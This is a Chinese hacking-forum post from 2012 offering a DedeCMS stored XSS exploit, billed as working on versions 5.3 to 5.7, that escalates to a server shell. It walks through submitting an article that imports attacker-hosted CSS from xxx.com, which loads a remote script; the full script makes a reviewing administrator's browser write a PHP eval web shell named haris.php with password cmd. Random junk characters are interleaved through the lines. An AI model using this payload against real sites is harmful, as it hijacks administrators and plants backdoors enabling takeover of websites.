找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1631|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
& d$ i( F( B8 P, E$ W1 `( V/ u- _为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
9 v. ]$ g. _( o* u4 C' T5 P目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
9 X- a5 I( M" o' T. h9 W$ `下面说说利用方法。. B- U  R0 U. ~" i1 Q3 Y5 I
条件有2个:
$ I& W. L7 {9 ~: v+ k0 V1.开启注册
" G8 n8 C, E2 k1 Q4 ~2.开启投稿
/ n0 b2 O/ H& ~+ R7 U注册会员----发表文章
$ A& [! l3 N+ F8 d  _& x2 N内容填写:
5 |0 {- Y" d0 [" O复制代码
5 |8 t) h; h. B3 E<style>@im\port'\http://xxx.com/xss.css';</style>
4 ^: D7 @( ~2 e' q% P新建XSS.Css: A: ^; O! ]7 ]6 r: x
复制代码
5 U) [" {1 `( E) P$ a2 V.body{5 Y0 a1 e3 s+ l
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }% W( S1 [- p. d; S/ E( i! k8 h
新建xss.js 内容为$ V, o# `" V0 z9 Q
复制代码) ?0 N  m8 h" I- p0 M
1.var request = false;
* k( L& p! X7 a' v' u: i2 Q) p2.if(window.XMLHttpRequest) {
' l$ u1 j. M. C. |6 r" Z9 O3.request = new XMLHttpRequest();7 L$ ]. i6 ?7 ^
4.if(request.overrideMimeType) {6 T! {3 c/ c6 U. q, d0 X
5.request.overrideMimeType('text/xml');2 x  V; |) y- V8 C- L- `) n5 ?
6.}
' O# D( a2 m2 X% J7.} else if(window.ActiveXObject) {8 a5 H7 Z- Y/ _' W' y
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
# k# A" L9 x$ ?0 L; s2 D9.for(var i=0; i<versions.length; i++) {6 [2 s$ }& @; I) D& ^9 _8 z+ C( x
10.try {$ N1 E6 M  H, ?  z* j, z
11.request = new ActiveXObject(versions);4 K9 d) P, [+ B" w- Z% z3 r
12.} catch(e) {}6 @, ~+ Z3 s& U' N  s0 i4 B; Q
13.}
# w" J8 H. A, J6 Y5 f5 Q14.}% M$ Y& }7 e+ i# }
15.xmlhttp=request;) g- ?& M1 {6 H2 p, D) q+ o) Z1 W
16.function getFolder( url ){
( F2 d  A( K% a6 n4 ^17. obj = url.split('/')
: Z' V" I" m5 U# ^9 u18. return obj[obj.length-2]* j4 q* w7 j0 I6 C
19.}
* ~6 T) o7 f9 Q0 ?6 A20.oUrl = top.location.href;9 h( K& H1 G- h$ F
21.u = getFolder(oUrl);/ {1 r( d2 Q8 Z1 h/ `; ^
22.add_admin();, L8 l6 d6 h1 ~' d, w6 p
23.function add_admin(){- D! i1 b5 D/ j9 ^
24.var url= "/"+u+"/sys_sql_query.php";
6 E# M. b) d8 O% x25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";- m. U3 M+ J! H5 t7 z
26.xmlhttp.open("POST", url, true);
1 U; ~1 V% Y6 k5 H5 R6 X6 i9 g27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
/ }5 V- R7 o8 ]7 V: ~! r  E+ t28.xmlhttp.setRequestHeader("Content-length", params.length);
' S! _3 D" w: ]' g! H& v& [; |29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
: k9 [) E( s" q  s1 y7 u, P! s30.xmlhttp.send(params);
% m$ t, r0 f! K31.}9 W! _+ ]( y+ w6 R! l
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表